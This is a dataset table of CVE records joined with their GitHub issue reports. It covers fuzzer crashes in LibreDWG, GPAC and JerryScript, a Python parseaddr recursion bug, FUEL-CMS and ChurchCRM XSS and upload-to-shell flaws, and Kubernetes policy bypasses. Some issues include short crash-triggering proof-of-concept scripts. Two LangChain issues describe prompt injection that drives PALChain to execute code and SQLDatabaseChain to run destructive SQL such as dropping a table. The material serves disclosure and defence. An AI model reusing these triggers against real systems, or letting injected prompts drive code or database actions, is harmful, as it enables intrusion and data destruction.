cve_id stringlengths 13 16 | cve_published stringlengths 23 23 | cve_descriptions stringlengths 54 1.07k | cve_metrics dict | cve_references listlengths 1 34 | cve_configurations listlengths 1 5 | url stringlengths 39 77 | cve_tags listlengths 1 4 ⌀ | domain stringclasses 1
value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 3 88.6k ⌀ | issue_title stringlengths 3 335 | issue_comments_url stringlengths 58 81 | issue_comments_count int64 0 146 | issue_created_at stringlengths 20 20 | issue_updated_at stringlengths 20 20 | issue_html_url stringlengths 39 62 | issue_github_id int64 128M 2.09B | issue_number int64 1 122k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2023-36274 | 2023-06-23T15:15:10.213 | LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_write_TF at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/677#BUG2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/LibreDWG/libredwg/issues/677#BUG2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] |
Hello, I was testing my fuzzer and found two bugs in dwg2dxf, which is different from #368 and #484
## environment
ubuntu 20.04, GCC 9.4.0, libredwg latest commit 77a85621de6e2c7ea44bc48c02e52dac97778ecb
compile with
```
./autogen.sh && ./configure --disable-shared && make -j$(nproc)
```
## BUG1
```
/li... | [FUZZ] two bugs in dwg2dxf | https://api.github.com/repos/LibreDWG/libredwg/issues/677/comments | 2 | 2023-03-30T04:10:56Z | 2023-04-04T14:03:23Z | https://github.com/LibreDWG/libredwg/issues/677 | 1,646,878,719 | 677 |
CVE-2023-36632 | 2023-06-25T18:15:09.313 | The legacy email.utils.parseaddr function in Python through 3.11.4 allows attackers to trigger "RecursionError: maximum recursion depth exceeded while calling a Python object" via a crafted argument. This argument is plausibly an untrusted value from an application's input data that was supposed to contain a name and a... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://docs.python.org/3/library/email.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://docs.python.org/3/library/email.utils.html"
},
{
"source": "cve@mitre.org",
"ta... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FBFABA38-746A-451D-A9DB-8AF31A4AE9B3",
"versionEndExcluding": null,
"versionEndIncluding": "3.11.4",
"versionStartExcludin... | https://github.com/python/cpython/issues/103800 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"python",
"cpython"
] | # Bug report
We did a fuzzing test on Python3.9.15, a recursion error happened.
```python
from email.utils import *
import email
import email.utils
import re
class demoCls():
def __init__(self):
pass
def demoFunc(self, arg):
try:
ret = email.utils.parseaddr(arg)... | RecursionError in email.utils.parseaddr | https://api.github.com/repos/python/cpython/issues/103800/comments | 2 | 2023-04-24T21:53:40Z | 2023-04-25T17:55:49Z | https://github.com/python/cpython/issues/103800 | 1,682,097,315 | 103,800 |
CVE-2023-33661 | 2023-06-29T00:15:09.567 | Multiple cross-site scripting (XSS) vulnerabilities were discovered in Church CRM v4.5.3 in GroupReports.php via GroupRole, ReportModel, and OnlyCart parameters. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/ChurchCRM/CRM/issues/6474"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*",
"matchCriteriaId": "C5A21E4C-1CE8-4C97-9374-DD8EBDB942D5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | https://github.com/ChurchCRM/CRM/issues/6474 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
/churchcrm/GroupReports.php
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Linux
#### What ... | XSS exists in the group report page | https://api.github.com/repos/ChurchCRM/CRM/issues/6474/comments | 2 | 2023-04-21T19:07:58Z | 2023-11-05T01:05:42Z | https://github.com/ChurchCRM/CRM/issues/6474 | 1,678,971,305 | 6,474 |
CVE-2020-22151 | 2023-07-03T21:15:09.240 | Permissions vulnerability in Fuel-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted zip file to the assests parameter of the upload function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/551"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/daylightstudio/FUEL-CMS/issues/551 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | 1. First create a php file that executes the command and compress the php file into a zip
<img width="606" alt="1" src="https://user-images.githubusercontent.com/9522862/74303980-98127100-4d96-11ea-9b59-101e6d44d889.png">
<img width="320" alt="2" src="https://user-images.githubusercontent.com/9522862/74304008-b11b22... | getshell in assets | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/551/comments | 1 | 2020-02-12T04:56:19Z | 2020-09-30T20:49:24Z | https://github.com/daylightstudio/FUEL-CMS/issues/551 | 563,752,895 | 551 |
CVE-2020-22152 | 2023-07-03T21:15:09.293 | Cross Site Scripting vulnerability in daylight studio FUEL- CMS v.1.4.6 allows a remote attacker to execute arbitrary code via the page title, meta description and meta keywords of the pages function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/552"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/daylightstudio/FUEL-CMS/issues/552 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | Stored xss in Page title, Meta description, Meta keywords of pages
<img width="1140" alt="xss1" src="https://user-images.githubusercontent.com/9522862/74311085-9a31fb00-4da9-11ea-84a0-b65eb76ba02b.png">
<img width="1146" alt="xss2" src="https://user-images.githubusercontent.com/9522862/74311126-aae27100-4da9-11ea-9f8... | XSS in pages | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/552/comments | 0 | 2020-02-12T07:10:34Z | 2021-04-15T18:33:49Z | https://github.com/daylightstudio/FUEL-CMS/issues/552 | 563,798,483 | 552 |
CVE-2020-22153 | 2023-07-03T21:15:09.340 | File Upload vulnerability in FUEL-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted .php file to the upload parameter in the navigation function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/553"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/daylightstudio/FUEL-CMS/issues/553 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] |
<img width="837" alt="c1" src="https://user-images.githubusercontent.com/9522862/74326653-bc397680-4dc5-11ea-9e41-c24b32bf4bad.png">
upload function:
<img width="1006" alt="c2" src="https://user-images.githubusercontent.com/9522862/74326673-c3608480-4dc5-11ea-89d8-9246baff623c.png">
$This-> fuel-> navigation-> u... | Code execution in navigation/upload | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/553/comments | 0 | 2020-02-12T10:44:49Z | 2020-09-30T21:04:55Z | https://github.com/daylightstudio/FUEL-CMS/issues/553 | 563,911,041 | 553 |
CVE-2020-22597 | 2023-07-03T21:15:09.383 | An issue in Jerrscript- project Jerryscrip v. 2.3.0 allows a remote attacker to execute arbitrary code via the ecma_builtin_array_prototype_object_slice parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/3637"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:2.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BCC6C843-EE98-4852-8D03-7FC19D2E821C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/3637 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
`655110a` commit
###### Build steps
```sh
python tools/build.py --clean --compile-flag=-fsanitize=address
```
###### Test case
```
a = []
for(var i=0; i<100; i++) a.push(i)
a.slice(0, {valueOf: function(){a.length=0; return 100;}})
```
###### Output
```
==34465==ERROR: Addr... | SEGV on ecma_builtin_array_prototype_object_slice | https://api.github.com/repos/jerryscript-project/jerryscript/issues/3637/comments | 0 | 2020-03-24T14:11:59Z | 2020-03-27T20:24:09Z | https://github.com/jerryscript-project/jerryscript/issues/3637 | 586,989,326 | 3,637 |
CVE-2023-2727 | 2023-07-03T21:15:09.480 | Users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"inte... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/06/2"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/kubernetes/kubern... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "44D47082-4E70-4CBE-B52B-B2A83903F17B",
"versionEndExcluding": null,
"versionEndIncluding": "1.24.14",
"versionStar... | https://github.com/kubernetes/kubernetes/issues/118640 | [
"Issue Tracking"
] | github.com | [
"kubernetes",
"kubernetes"
] | ### CVE-2023-2727: Bypassing policies imposed by the ImagePolicyWebhook admission plugin
CVSS Rating: [CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)
A security issue was discovered in Kubernetes where users may be able to launch... | CVE-2023-2727, CVE-2023-2728: Bypassing policies imposed by the ImagePolicyWebhook and bypassing mountable secrets policy imposed by the ServiceAccount admission plugin | https://api.github.com/repos/kubernetes/kubernetes/issues/118640/comments | 10 | 2023-06-13T14:42:06Z | 2024-07-01T15:57:09Z | https://github.com/kubernetes/kubernetes/issues/118640 | 1,755,056,681 | 118,640 |
CVE-2023-36258 | 2023-07-03T21:15:09.797 | An issue in LangChain before 0.0.236 allows an attacker to execute arbitrary code because Python code with os.system, exec, or eval can be used. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation"
],
"url": "https://github.com/hwchase17/langchain/issues/5872"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langchain:langchain:0.0.199:*:*:*:*:*:*:*",
"matchCriteriaId": "99FB5025-85A6-41B6-B0DC-7D34C5FCFB6A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | https://github.com/hwchase17/langchain/issues/5872 | [
"Exploit",
"Issue Tracking",
"Mitigation"
] | github.com | [
"hwchase17",
"langchain"
] | ### System Info
langchain version: `0.0.194`
os: `ubuntu 20.04`
python: `3.9.13`
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Promp... | Prompt injection which leads to arbitrary code execution in `langchain.chains.PALChain` | https://api.github.com/repos/langchain-ai/langchain/issues/5872/comments | 5 | 2023-06-08T08:45:37Z | 2023-08-29T16:31:34Z | https://github.com/langchain-ai/langchain/issues/5872 | 1,747,393,600 | 5,872 |
CVE-2023-36189 | 2023-07-06T14:15:10.707 | SQL injection vulnerability in langchain before v0.0.247 allows a remote attacker to obtain sensitive information via the SQLDatabaseChain component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://gist.github.com/rharang/9c58d39db8c01db5b7c888e467c0533f"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/hwchase17/langchain/issues/5923"
},
{
"source": "cve@mitre.org",
"t... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langchain:langchain:0.0.64:*:*:*:*:*:*:*",
"matchCriteriaId": "0D9CEC27-1B1B-4365-82F1-2538DD3F158D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | https://github.com/hwchase17/langchain/issues/5923 | [
"Exploit"
] | github.com | [
"hwchase17",
"langchain"
] | ### System Info
There is no safeguard in SQLDatabaseChain to prevent a malicious user from sending a prompt such as "Drop Employee table".
SQLDatabaseChain should have a facility to intercept and review the SQL before sending it to the database.
Creating this separately from https://github.com/hwchase17/langch... | SQLDatabaseChain has SQL injection issue | https://api.github.com/repos/langchain-ai/langchain/issues/5923/comments | 7 | 2023-06-09T07:19:24Z | 2024-03-13T16:12:29Z | https://github.com/langchain-ai/langchain/issues/5923 | 1,749,279,355 | 5,923 |
CVE-2023-36189 | 2023-07-06T14:15:10.707 | SQL injection vulnerability in langchain before v0.0.247 allows a remote attacker to obtain sensitive information via the SQLDatabaseChain component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://gist.github.com/rharang/9c58d39db8c01db5b7c888e467c0533f"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/hwchase17/langchain/issues/5923"
},
{
"source": "cve@mitre.org",
"t... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:langchain:langchain:0.0.64:*:*:*:*:*:*:*",
"matchCriteriaId": "0D9CEC27-1B1B-4365-82F1-2538DD3F158D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | https://github.com/langchain-ai/langchain/issues/5923#issuecomment-1696053841 | null | github.com | [
"langchain-ai",
"langchain"
] | ### System Info
There is no safeguard in SQLDatabaseChain to prevent a malicious user from sending a prompt such as "Drop Employee table".
SQLDatabaseChain should have a facility to intercept and review the SQL before sending it to the database.
Creating this separately from https://github.com/hwchase17/langch... | SQLDatabaseChain has SQL injection issue | https://api.github.com/repos/langchain-ai/langchain/issues/5923/comments | 7 | 2023-06-09T07:19:24Z | 2024-03-13T16:12:29Z | https://github.com/langchain-ai/langchain/issues/5923 | 1,749,279,355 | 5,923 |
CVE-2023-37132 | 2023-07-06T15:15:16.253 | A stored cross-site scripting (XSS) vulnerability in the custom variables module of eyoucms v1.6.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/45"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/45 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | 123 | 123 | https://api.github.com/repos/weng-xianhu/eyoucms/issues/45/comments | 0 | 2023-06-27T03:33:35Z | 2024-03-22T06:49:26Z | https://github.com/weng-xianhu/eyoucms/issues/45 | 1,776,028,889 | 45 |
CVE-2023-37133 | 2023-07-06T15:15:16.297 | A stored cross-site scripting (XSS) vulnerability in the Column management module of eyoucms v1.6.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/46"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/46 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | 123 | 123 | https://api.github.com/repos/weng-xianhu/eyoucms/issues/46/comments | 0 | 2023-06-27T06:11:29Z | 2024-03-22T06:49:27Z | https://github.com/weng-xianhu/eyoucms/issues/46 | 1,776,161,891 | 46 |
CVE-2023-37134 | 2023-07-06T15:15:16.343 | A stored cross-site scripting (XSS) vulnerability in the Basic Information module of eyoucms v1.6.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/47"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/47 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | 123 | 123 | https://api.github.com/repos/weng-xianhu/eyoucms/issues/47/comments | 0 | 2023-06-27T06:31:23Z | 2024-03-22T06:49:27Z | https://github.com/weng-xianhu/eyoucms/issues/47 | 1,776,185,888 | 47 |
CVE-2023-37135 | 2023-07-06T15:15:16.387 | A stored cross-site scripting (XSS) vulnerability in the Image Upload module of eyoucms v1.6.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/48"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/48 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | 123 | 123 | https://api.github.com/repos/weng-xianhu/eyoucms/issues/48/comments | 0 | 2023-06-27T07:00:09Z | 2024-03-22T06:49:27Z | https://github.com/weng-xianhu/eyoucms/issues/48 | 1,776,227,201 | 48 |
CVE-2023-37136 | 2023-07-06T15:15:16.430 | A stored cross-site scripting (XSS) vulnerability in the Basic Website Information module of eyoucms v1.6.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/49"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/49 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | 123 | 123 | https://api.github.com/repos/weng-xianhu/eyoucms/issues/49/comments | 0 | 2023-06-27T08:57:00Z | 2024-03-22T06:49:27Z | https://github.com/weng-xianhu/eyoucms/issues/49 | 1,776,421,874 | 49 |
CVE-2023-36201 | 2023-07-07T16:15:09.827 | An issue in JerryscriptProject jerryscript v.3.0.0 allows an attacker to obtain sensitive information via a crafted script to the arrays. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5026"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5026 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | # Version
*Version: 3.0.0* ( 6fe763f )
# Execution steps
```bash
/root/.jsvu/jerry Testcase.js
```
# Test case 1
```javascript
var foo = function(it) {
var a = [...it, , ];
print(a);
print(a.length);
};
var Parameter0 = [1, 2];
foo(Parameter0);
```
## Output 1
```
1,2
2
```... | Array concatenation exception | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5026/comments | 1 | 2022-09-27T01:43:11Z | 2022-10-04T10:41:02Z | https://github.com/jerryscript-project/jerryscript/issues/5026 | 1,386,949,916 | 5,026 |
CVE-2023-37174 | 2023-07-11T23:15:09.120 | GPAC v2.3-DEV-rev381-g817a848f6-master was discovered to contain a segmentation violation in the dump_isom_scene function at /mp4box/filedump.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2505"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev381-g817a848f6-master:*:*:*:*:*:*:*",
"matchCriteriaId": "264FC010-3E8E-4717-8828-B8F53234EECB",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | https://github.com/gpac/gpac/issues/2505 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"gpac",
"gpac"
] | Hello,I use the fuzzer(AFL) to fuzz binary gpac and got some crashes.
The following is the details.
## Title: SEGV on unknown address 0x000000012c29
**1. Description**
A SEGV on unknown address 0x000000012c29 has occurred in function dump_isom_scene /root/gpac/applications/mp4box/filedump.c:226:2
when running... | SEGV on unknown address 0x000000012c29 | https://api.github.com/repos/gpac/gpac/issues/2505/comments | 0 | 2023-06-27T08:29:57Z | 2023-06-27T13:29:56Z | https://github.com/gpac/gpac/issues/2505 | 1,776,376,880 | 2,505 |
CVE-2023-37765 | 2023-07-11T23:15:09.167 | GPAC v2.3-DEV-rev381-g817a848f6-master was discovered to contain a segmentation violation in the gf_dump_vrml_sffield function at /lib/libgpac.so. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/gpac/gpac/issues/2515"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev381-g817a848f6-master:*:*:*:*:*:*:*",
"matchCriteriaId": "264FC010-3E8E-4717-8828-B8F53234EECB",
"versionEndExcluding": null,
"versionEndIncluding": null,
... | https://github.com/gpac/gpac/issues/2515 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"gpac",
"gpac"
] | Hello,I use the fuzzer(AFL) to fuzz binary gpac and got some crashes.
The following is the details.
## Title: SEGV on unknown address 0x000000000003(0x000000000009)
**1. Description**
